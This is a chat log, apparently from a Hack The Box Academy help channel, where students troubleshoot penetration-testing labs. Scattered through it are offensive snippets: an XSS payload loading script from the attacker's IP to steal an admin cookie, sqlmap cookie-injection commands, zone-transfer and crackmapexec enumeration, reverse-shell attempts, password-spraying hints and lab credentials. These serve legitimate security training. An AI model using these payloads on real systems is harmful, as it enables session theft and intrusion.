where is support? I don't see a contact support button
it's at the bottom right of every academy page, if you don't see it, turn off adblock
I just guessed what the Hex was based on the "equation" you provided. I feel mighty foolish for not thinking through it better. Thank you very much.
Another foolish question, do you happen to be zoomed in very far? You can also not access it from the pwnbox. There is a warning when you open the page from the box.
I'm on the module page, I came out of it, under get help, is it the help center? was there where you got support?
My current issue is the splunk instance doesn't have the Sysmon app that they're asking us to fix
wait, how did you think you were supposed to solve the question? you do know that you're supposed to download this right?
Yes, I did download it. I just had the wrong value in the rax
Thank you again
I appreciate it
anytime
answering my own question, changing browsers, there's a popup
Hi has anyone finished command injection module? I have solved the final skill assessment but would like to discuss cuz I think I solved it with necessary steps and can't get the ez method working.
Thank you. I dont know what worked here but I switched it from NAT to Bridged and then terminated all openvpn sessions. Regenerated vpn from the website, set it to TCP, then ran the vpn with the --config extension
mods should really add verification to academy channels
read the #rules, keep asking for stuff like that and you'll get the 👢 up your ass
done that module a good while ago and don't really have that good of a note on that one but you can shoot me a dm if you still have questions about that
LOL
probably caused by your NAT being set to the 10.x.x.x subnet for some reason, just vbox being vbox
Hi I have some questions about dante lab which channel should i join can somebody add me to it. Appreciated
read #welcome and #rules after that use /verify at #bot-commands and ask your questions in #prolabs-dante
Did you still need help?
Just curious how everyone is pulling their user lists for the AD enum and attack module. I'm not super great with bash so I couldn't figure out how to do it by that, so I had to do it by hand.
hey I'm having trouble with the last Q in "AD Enumeration & Attacks - Skills Assessment Part I"
I think I need to use || Mimikatz - PowerShell Remoting with Pass the Ticket || but I having trouble with it, someone up for consulting ??
Can someone recommend me the best way to learn C for free?
Take a look to your mimikatz output, you should see something interesting after ||dumping secrets|| then it is always good to check ||rights of any new domain account||
not so sure what u mean ...
Anybody know how to use the OPTIONS method in burpsuite?
You use them very carefully (idk)
Those are just your standard http options yeah
GRACIAS
Can anybody give me a nudge about where to look in the Windows Privilege Escalation Module, section "Other Files" ? cant find the password they are asking for -.-
Assuming you already have access to ||tpetty|| then check its domain rights and you will know what to do, otherwise work around mimikatz or whatever tool you use to dump the same things
access u mean by that:
right?!
Hi!
I recently encountered a problem in the module "ATTACKING COMMON SERVICES: Attacking DNS". Please tell me what is the problem?
I don't understand what the purpose of the assignment is. I found all subdomains. I tried to find some records on them, but I didn't find anything. I don't understand why the target ip is given in this task
Because you're meant to use dig and some other tools to find the answer against the IP
I.e. dig axfr inlanefreight.htb @ip
Thanks, but I tried to use this command, it doesn't work, it gives the following:
└─$dig axfr inlandfreight.htb @10.129.203.6
; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> ; <<>> DiG 9.19.17-1-Debian <<>> axfr inlanefreight.htb @10.129.203.6
;; global parameters: +cmd
; Transfer failed.
A zone can be configured so that a zone transfer is only permitted from certain servers
"And some other tools" the section does go over some tools
try "PSSQLite"
if U get an error check if it's because the scope is already unrestricted...
"><script src=http://10.10.14.15:9000/TESTING_THIS</script>
anybody see something wrong with this?
can I DM?
put the URL in "" after src=
Like this "><script src="http://10.10.14.15:9000/TESTING_THIS"</script>
That didn't work either
Working on the Attacking Enterprise Networks, Web Enumeration & Exploitation, Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer.
support.inlanefreight.local section
There's a ticket submitting forum, I'm supposed to enter that into the message box and catch it back with nc. I'm getting nothing back
close it
"><script src="http://10.10.15.131/fullname"></script>
What's the full name?
sqlmap -r req-case3.txt --batch --dump --cookie='id=1' It doesnt attack cookie id - how can i manage with sqlmap to inject into cookie id
yes, I think so:
"><script src="http://10.10.14.15:9000/TESTING_THIS"></script>
can u refer the section or Q ?
Module: sqlmap Section:Running SQLMap on an HTTP Request
What is the "Testing_This" supposed to be?
I haven't got there yet...
U ahead of me
Tried this verbatim and didn't work
I don't understand
Y R U using -r?
alright ... didnt file any .sqlite file so far, but I guess I missed it then
did U visit that folder and took its correct name?
@umbral fulcrum yes
yes?
i mean im using -r flag but its not attacking cookie id what i have to do
damn I mistyped it before, now it all makes sense, thanks!
hello, very stupid and basic question probably - how to setup vm in a way so its startup fresh instance every time?
not even sure how to look that up in google
Which form field did you use?
Is your web server running on port 9000?
try to add * after 1:
'id=1*'
I used the message field
9000
The module is structured like a walkthrough. Do exactly what is described there.
I believe i am?
Oh, I see...
10.10.14.15 is your IP?
No, i'm putting my ip in though
Restart the instance and then try again. If it doesn't work, try it from the PwnBox
HAHA Restarting worked
Hey @umbral fulcrum can i dm you?
Need to ask something regarding the AD skill assessment part 1 ?
sure
but I think I'm the one that need help there
Ammm just a little push i need
go ahead ...
hey, can anyone help me with 'intro to assembly language:conditional branching'? It ask me to give the hex value that breaks the loop, so I thought it would be ||10|| or ||0xa||, but I got that wrong, can someone help me with this?
Hey guys, so I was looking at doing a tier IV module but it appears to be 90 euros for 1 single module? Am I seeing this correctly?
its 58 if you sub for platinum for one month and instantly cancel, but yes, it is that pricey for the IV modules
- vat so I guess it becomes a bit more expensive still
Is it just me? I can't connect to any Splunk instances in the Academy module. I have tried from both pwnbox and my machine. Says connection has been reset, yet the port is open in nmap scan.
I need some help on this
Connect to the target and enumerate the available network shares. What is the password of the Administrator2 user?
Is there a way to figure out how long an nmap scan could take?
Be more specific
I could not find the password
Ok
I have already searched in all shares folder
What module and section is it?
Why doesn't HTB academy develop a mobile application (Android/IOS) PT modules
Windows attack & defense - credentials in share
Hello !
I'm doing the password attack module and i cant install pypykatz on my parrot os
Is there an alternative or a solution ?
I asked this question before and It has less demand i guess compared to Web other category
You haven't.
There's nothing complicated, just following the commands in that section itself will lead you to the password.
why can't you install
in "AD Enumeration & Attacks - Skills Assessment Part II" I went through the whole linux section but I can't C another use in the domain
what am I missing?
please...
I'm doing Password Attacks Pass the Ticket from Linux, I can't get to the DC01 domain, I've checked the validity of the ticket, but keep getting a "dc01.inlanefreight.htb does not exist" error
anyone else having problems spawning target instances?
Is there some glitch in the some of the HTB academy modules where you have to restart your virtual machine multiple times (or at least more than one) for your nmap results to show what port you need to use for that particular lab or are some machines just intentionally designed that way?
if you are talking about the FTP section in the attacking common services module then yes that's a known bug for some time now but it's still a bug nonetheless
Thats what I had in mind ... but I seen another lab that also had this issue
Yes it has happened with me too, multiple of times.
#modules https://academy.hackthebox.com/module/176/section/1778 WINDOWS ATTACKS & DEFENSE in kerberoasting section
After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?
both target machine and pwnbox instances spawned just fine for me so if you are having issue wait for a bit but if the issue persists contact support
there is any help for that
i got the event of 4769 of kerberos and take the servicesid but htb academy tell me that wrong any help for that ? https://academy.hackthebox.com/module/176/section/1778
Which one?
i've encountered a good bit of similar bugs where it take a few reset to get the target working but if you found the issue and the issue persists probably contact support but if they can't re-create the bug there is nothing they can't do so keep that in mind if you contact them
It's better to mention the module name and section.
I eventually got the port I needed to use for that lab...but it took a number of resets that was higher than I anticipated for sure
@pure sorrel and @boreal kelp ask your questions in the format of which module and section are you stuck or having issue on, what did you try and work or fail and what to you need help with
Got it. Just a sec.
pls say module and section name not the id or url
what did you try?
can u help me with my question of kerberoasting in https://academy.hackthebox.com/module/176/section/1778
great, but better if this is in your initial question
Password Attack module, section Pass the Ticket from Linux
Currently stuck on the question of reading the contents of julio.txt from domain share folder \DC01\julio
I've set host and proxy chain file, transfered the tmp file to my attackbox, exported the environment variable and added it to bashrc, set up chisel on both my attackbox and MS01
When I used impacket wmiexec or evil-winrm it can't recognize the dc01 domain
i got 0 idea what you even need help with from your questions, just perform the attack in question 1 and filter for the ID 4769 like it said and check a few top one
BTW , once you found the nonstandard port for that lab...you bruteforce the credentials using a mut_password.list and a username.list via hydra tool?
great question, give me 2 sec i'll check my note on this
nope you do some enum
||Use username anarchy on the user you found and use cupp, with the first name (first letter capital), second name (first letter capital), add special chars and use leet mode. Keep everything else blank/NO.||
i did that, then got the servicesid, then htb academy tell me that is wrong answer
for this part just do it on the given target linux box but if you want to do it on your box for some reason make sure both the DC01 hostname and the FQDN DC01.inlanefreight.htb pointing to the DC01 ip and you'll need proxy access to this box not port forwarding if that's what you are doing
you are still giving me and anyone here way too little info to even start to help you, there is hundreds of event with god know how many ServiceSid but only a few have the 4769 id so filter for that id and try a couple of them
i tried all the answers wrong
there should be one right with the Service Name starting with ||web|| but i no long have access to that module so i can't double check or can't confirm anything
i can't find anything start by web
🤷♂️ like i said you're out of luck with me lol, just wait for a bit someone will come and help
there's a lot of people here have same trouble i search on that here
are u know right servicesid bro ?
are u know that bro ?
i need the right answer plz
beside annoying a couple of peoples you won't get anything much from spamming just wait and someone will help or if no help post your question here another time
you're tagging people from months ago wtf
I have told you here what you should do
hey guys, i just finished the smb section on footprinting module, everything went fine actually, but i don't understand why the path i found was given as a windows path and not a linux path structure
i mean i don't understand why the path is clearly displayed as C:...........\ but the answer should be formulated as a linux path structure
maybe i'm missing something ?can someone explain this to me
lol
Because it's hosted on a Linux box, smb uses Windows file structure so it reformatted to c:\
Hello everyone, I'm still trying to get through the Public Exploits Section and I keep getting this error whenever I try to use GoBuster on the target.
I've been googling to try and figure this out on my own, but I seem to have hit a wall. Any suggestions?
any1 with WINDOWS ATTACKS & DEFENSE module done can you dm?
Just ask your questions here, you'll get faster responses.
can you open the ip in your browser?
i fully understand it now ! thank you very much !
I tried to and it said unable to connect. Could the target machine be offline for some reason?
check the end of your section, you should be able to see the ip and lifetime if it is online
Aren't you missing the port?
I tried it with the port as well, and it still would not connect
gobuster dir -u http://IP:PORT/ -w /usr/share/dirb/wordlists/common.txt
Make sure your command is like this. The slash at the end of the URL is important.
It's still giving me the same error
I even tried resetting PwnBox and spawning a new target machine, same error
you need to add the port and the http://
and now you using a different ip address, you sure it is the correct one?
so something like that: gobuster dir -u http://94.237.49.11:xxxxx -w /usr/share/dirb/wordlists/common.txt
But you shouldn't need GoBuster in the "Public Exploit" section from Getting started.
I thought I was supposed to use it to find the services running on the target.
Can anyone help with SOC Analyst
What exactly do you need help with?
Managed to figure it out, just misunderstood the directions. Thanks
good day friends, i am at Broken Authentication - Username Injection, tried to add the userid field, tried to remove the oldpasswd field, and tried to change to GET method, but still having "invalid credentials" i am stuck for some time now, any hint please
and tried to edit submit=doreset to submit=submit
i am not sure like should i brute the old pass or what, dont think this is the case
Hi I am currently in SOC lab Windows Event Logs & Finding Evil in the first section Windows Event Logs the first question wants you to RDP into the target but I don't know how to RDP. I believe the command I need to use is this Baldwin0374@htb[/htb]$ xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:[Target IP] /dynamic-resolution
I have tried opening a terminal in the pwnbox and using this but I must be entering it wrong
man xfreerdp (1): xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built-in to many editions of Windows. Alternative servers included xrdp and VRDP (VirtualBox).
ok
Ok so these are the man pages
All options for xfreerdp are explained here
So the example in the lab is not the correct command
The commands discussed in the module are actually always correct. Sometimes an IP or a port must be adapted
Ok I will try some things and see what happens
Hey, I have a Q regarding the "AD Enumeration & Attacks - Skills Assessment Part II"
in Q 4 I'm asked to use a common method to obtain weak credentials for another user, I'm guessing it's ||users spraying || with ||Password123|| or|| 12345678 || and so on, but I can't get a users list.
so am I supposed to find online some sort of a users list or I'm missing something??
Ok I figured it out thank you so much
Hello, I just started Hack in the Box and so far only completed the module: Intro to the academy. I am an online college student, my major is computer science. I start programming one next month (end of December/beginning of January) and am trying to get somewhat of a head start. What module would be most beneficial to do next? I have not a clue where to go and would appreciate someone pointing me in the right direction. Thank you!
You should check out #welcome to see the rest of the server and check out the paths. Information Security Foundations or SOC Analyst Prerequisites are paths you should consider.
https://academy.hackthebox.com/path/preview/information-security-foundations
https://academy.hackthebox.com/path/preview/soc-analyst-prerequisites
Hey, does anyone know why this happens? A few days ago I was connecting fine
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Can someone teach me how to hack website because my ACC inactive and I need it back
Ask the Website Support for help
For the Intro to Whitebox Pentesting SA, still extremely puzzled by Skills Assessment 2. Hint says ||code injection should not be possible, even without sanitization or validation||, but not running eval, ran thru a code analysis tool and it suggested the ||new Function|| bit could be bad, so removed it and code analysis is happy anyhow, but the patch checker still seems to think it's vulnerable, and it states using external modules (e.g.: safe-eval) is not allowed so...🤷 what am I missing?
EDIT: Resolved. The checker (if hints are enabled) will only show ONE thing that's wrong... I'd argue the order of it is not ideal (leading to my spinning in circles) but should have realized it on my own. My problem was, and this is a hint that is sometimes given, it wasn't in my particular case as again -- ||it's gotta run clean -- no crashing||
Okay! I wasn't sure where was a good place to start in the academy. Thank you!
Yeah, I finally got it solved after this:
In your case, I think it was a date formatting issue:
MM-DD-YYYY
Hello! I am working on Windows Attacks&Defence module. I couldn’t connect to the PKI server (172.16.18.15) in the PKI-ESC1 attack section. The server seems down or don’t accept the connection. I tried to connect using the attacker machine (Kali) and Bob’s WS001 (Windows). Neither of them worked. You guys have a clue on how I can connect to PKI...
in Attacking Tomcat what is the wordlist to use for the bruteforce xd
ok why it works now but not before
it depends XD?
wtf is wrong with this section? brute force only works in the 1st minute of spawned target
if this happens in exam im done
firewall not active yet 😄 jk no idea actually
i mean
the creds are correct since they are accepted as answers in the section
but not working in the instance to attack
this is kind of frustrating
ok, confirmed:
- spawn a new instance of the target
- log in with correct creds
- sign out of tomcat manager dashboard by closing firefox
- creds no longer work
Currently working on "cracking passwords with hashcat" section Cracking Common Hashes
Is it really just trying random rules and hoping for the best or is there something to narrow it down?
I'm doing the Windows Priv Esc Assessment i. I'm stuck on using command injection to connect back to my attacking box. (this is not covered in this module, nor have I learned how to do it). I've done some enumeration on the website but have been unable to connect back to my pwnbox instance. I have a nc listener set up on my attackbox to receive requests. I've tried some versions of netcat (nc, ncat, netcat) with reverse shells, tried to curl a test file on an http server, tried wget, tried telnet. nothing is connecting back to my attack box. Am I doing this incorrectly?
did you download anything to victim machine to get a shell?
read #welcome
and then
name your Module, section and question and then what did you try, Someone here will definitely help you
Ok , thank you
Is there an easy way to copy files from the Quests to the pwnbox? i usually use my own kali box, but the current question is like "use exploit located in /opt/ folder in the pwnbox.
Usually, they will provide you with a link to a repository to download the exploit to your machine. If not, you can search for and download it. However, if it is something specifically created for the exercise, you will have to use it, which is very rare tho
yeah i ended up googling the exploit and got it to my machine. was just wondering how you would get the provided 7z file to the pwnbox
Module : DNS Enumeration Using Python , section DNS Records and Queries , I'm stuck at question 1
What IP are you having the reverse shell try and connect to
I tried but it's incorrect answer
Blur out answers in screenshots my guy
10.10.14.237
And you have a way to load the shell? Such as navigating to the webpage the shell is on?
It's asking you to investigate all records, start with a zone transfer or other queries. It's asking for the Unique Record
thank you , can't figure out what they mean by "the one unique record"
I'm currently on the website from the http port 80, injecting using the 127.0.0.1 & .... method, getting returns for things like 'dir', 'whoami', but when i attempt to curl/nc/wget anything back to my attacking machine I don't get any connections to a NC listener nor to an http server. I'm sure I'm missing something very basic, but again, haven't really done a module where I'd learned how to solve this 🙂
Well when you do something like a zone transfer you get all available records it's willing to give you if you have the name server
Nslookup will give you the name server to use with dig
dig axfr inlanefreight.com @name_server
@fathom pendant thank you , I have to find @name_server of inlanefreight.com ? , I tried with dig ns inlanefreight.com then I used the ns : dig axfr inlanefreight.com @ns1.inlanefreight.com , time out :/
Weird
Hi there! Can someone help me on the Skills Assessment on Introduction to Digital Forensics?
the question started with " Investigate all records for the domain "inlanefreight.com"" I thought we can do it with dig +all inlanefreight.com , can't see the relation with zone transfer neither what I got wrong
You can do all
Like, the module focuses heavily on volatility and zimmerman tools, and the skill assessment is on a tool they mentioned like 3 times
But just as a note all/any requests are mostly deprecated
Hello there, anyone experimenting long times of waiting when spawning machines on the Academy?
yup
couldn't spawn mine for a good 15min and just quit
went to read theory
Weekends are generally rough on all htb servers
Alright, I'm doing F5 + clicking again and it works after some tries
Can someone help nudge me on the module crackmapexec skills assessment.
Got 3 users but unable to get the flag in SQL01 question 2
cant make it work now
Does anyone remember which module was about rdping into the Windows machine and changing to the 'Administrator' user?
I am working on the 'HARD' lab of the Attacking Common services module and I don't understand why 'SYSTEM_US' is an invalid column name. I am using the master database.
are you sure that is a valid column name?
Not entirely sure
I'm doing the Password Attacks Lab - Easy, and I found the user and password, but am having trouble connecting to both ftp and ssh. Ftp says connection refused, and ssh says permission denied (publickey)
I don't know what to do with the public key, I've tried solutions online like changing permissions and options in the config file. I know im missing something but I can not remember what
Any help would be super appreciated
why don't you take a look at the related sections to find out
if it asks for a public key then you need a ssh key for that
you are having trouble ftping to the ip address? you should be able to connect to it and find an essential piece of information. I would try to reconnect
So I'm supposed to be able to ftp in? That's good to know, I tried reconnecting but I'll keep trying
I think they're saying that you should be able to login to ftp, I don't remember that part but if you have a username and pass, test them against all services
oh , its 'SYSTEM_USER'
i cant fkn spawn targets 
Me too, they're taking a really long time to spawn
@languid fjord take a look if you can, its not working . I tried with EU1 and EU2
good night hope tomorrow it would be fixed
Is it not working, or taking a long time to spawn
for me never spawn
and when it spawns (if it does) it has like 20 minutes less than the usual 118
Poked our infra team about it
thankss
can any one tell me what I might be doing wrong here. I was able to follow along and ' order by 1,2-- , etc, to figure out the number of columns. Which it gives you in the lesson anyway. Even when I try to union select the number of columns i get no response. it just loads. i've tried... cn' UNION select 1,user(),3,4-- -, (space of course) nothing. ive tried ' union select 1,2,user(),4-- , ' union select null,user(),null,null-- - and it just loads. am I missing something?
Do any of you find yourselves doing some of these exercises and you think you are well on them and are progressing with learning hacking skills... but suddenly it gets hard quickly? That is how I felt with the Common attack services hard lab...mainly with the last question of that lab
Best path anons
Are we all having issues spawning machines?
yes, seems like academy machines are struggling rn
that hard lab is certainly more than the rest, but being able to adapt is a good quality to have
for academy?
Hi buddy,
I have been working to learn cyber sec from about 1.5 yrs
I am preparing for OSCP after 1 year
Please someone can guide me and be my mentor for the journey 🏆
I assure the journey will be very joyful and full with surb knowledge we share
You're not really gonna find a mentor here
do cpts
if you understand you'll pass oscp with 0 issues.
the most you can do is learn how to learn on your own.
Is it bad I find Linux challenging
we all start somewhere, use it more and you'll get the hang of it
I feel like I get stuck forever on the questions
Do you find guiding yourself difficult?
At times. I think. I’m a truck driver with limited and various computer knowledge. I only get to play with a few times a week
I’m trying tho to do all the classes and keep practicing
hey, that's pretty cool that you're trying this, keep going, it might take some time but you'll get better as it goes on
I’m hoping so, it’s the orders that I’m searching but I hope it all comes together
Do you learn the most out of this by doing more so than reading about hacking and cybersecurity
Yes. I feel like what I read don’t apply to the questions completely
I feel like I have alot to learn outside the commands
Kinda
There are so many things to study and do
Getting help from a person who has already faced that will make the path very clear and easy
I’m hoping by throwing myself in I’ll learn more than just commands, I need to be able to picture how everything works I guess
if you need help, just send a message here, people will be willing to help, provided you have done your due diligence of course
Can someone help me in modern web exploitation techniques? Im stuck in the xss part
I tried for 3 days
Pls tag me if someone can help me
WINDOWS ATTACKS & DEFENSE
Skills Assessment
My attempts to replicate the steps shown in performing PKI - EC8 aren't consistent with the results shown in the module. Namely, copying the Base64 output from the attained certificate into Rubeus is throwing an error:
The command ran, as written:
.\Rubeus.exe asktgt /user:DC2$ /ptt /certificate:<b64_here>
I'm not certain why Rubeus is throwing this error and would welcome help
I haven't started working on the module yet FYI.
The error "KDC_ERR_PADATA_TYPE_NOSUPP" means that the KDC is not set up for Kerberos authentication.
But, reading the below link, it might also be an indication that your targeted KDCs do not have certificates with the necessary EKU. So you cannot use your certificate to get a TGT
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771#:~:text=KDC_ERR_PADATA_TYPE_NOSUPP
I'm doing "Intro to Networking and Traffic Analysis", I'm nearly complete the Wireshark portion. Following the instructions, I captured for 10 minutes and still found no image in the filter, unless I'm missing something.
Done it multiple times, any help would be appreciated
(I can't finish the module unless I find the image)
@hallow remnant Might be going out of the module's scope, but If it's a DC (assuming from the computer name), it definitely gotta have LDAPS and thus use Schannel. If that's the case, there's no need to use a smart card EKU and use the Schannel to use certificate authentication. There is a PowerShell script for performing LDAP whoami using certificates through SSL. https://github.com/leechristensen/Random/blob/master/PowerShellScripts/Get-LdapCurrentUser.ps1
Get-LdapCurrentUser -Certificate c:\Users\scriptie\potterDC.pfx -Server DC.potter.local:636 -UseSSL
Then, you should be able to use https://github.com/AlmondOffSec/PassTheCert and abuse further on.
Let me know if you're able to make use of it.
It turned out to be an aberrant behavior; restarting the lab resolved the issue.
Thanks though!
Ah, thought it was intentional.
Why can’t I use other channels like pwnbox?
you need to verify yourself, read #welcome
Can someone help nudge me on the module crackmapexec skills assessment.
Got 3 users but unable to get the flag in SQL01 question 2
Hey I’m new what do I do here
Hello all!! Any news about target spawning system?
some one up for help in "AD Enumeration & Attacks - Skills Assessment Part II" Q 4:
"common method to obtain weak credentials for another user"
I got valid username but can't get the spraying to work ...
??
Hey, any idea why machines are not getting spawned? Been waiting for few minutes and still have the "Target is spawning..." message
Look in the module to see which password was used. If I remember correctly, this will help you.
W* right?
didn't work, what's weird to me, is that I got the valid usernames cause I can see there "baddpwdtime"
so I don't understand what went wrong ....
is htb academy down
U'll C an IP when it's done
yea but its taking "unusually" long
yes it's happened sometimes
How did you create the user list?
semi spoiler: ||crackmapexec smb *** --users | grep -v 'baddpwdtime: 16' ||
||You have creds. Try it with these||
is it still spinning
of course with the creds A* : w*
my 2
don't grep anything
this list is enormous
and doesn't make sense, this user never got the creds wrong???
Why? Perhaps this user has never even logged in
so ur saying I should first try "never login users" 2 C if they still have the given creds that R already proven 2 B weak in this assessment ...
No, you should test every user.
you know absolutely nothing about these users, except that one user obviously uses a simple password. That's what the question suggests.
it is still loading whats wrong
This could be a new user who has never logged in, it could be a user who uses such a simple password and has therefore never entered it incorrectly, but it could also be a user who regularly enters his password incorrectly...
not regarding the Q...
I saw earlier that the Policy is incredibly weak, so according 2 what u said (make sense ) I'm guessing they want me 2 think like that:
weak creds, go check if there's a user who never logged in and still alive in the domain or what u said as well (have old standard password)
Ask the support
i just wanna know if its only for me or other experience the same
ur not alone
oh okay i was worried problem was with my side
Yo, anyone else got trouble with a target being spawned?
Oh damn.
It ain't for me only.
yep
proceed with next one then maybe
Would be wise to do.
But I don't wanna miss the Live Engagement.
So I will just be patient.
;p
it is not missed, it is just postponed
Sounds good to me.
Today I'm having problems spawning the Documentation & Reporting Practice lab. Anybody having the same issue in the academy labs?
its for all the labs
me too
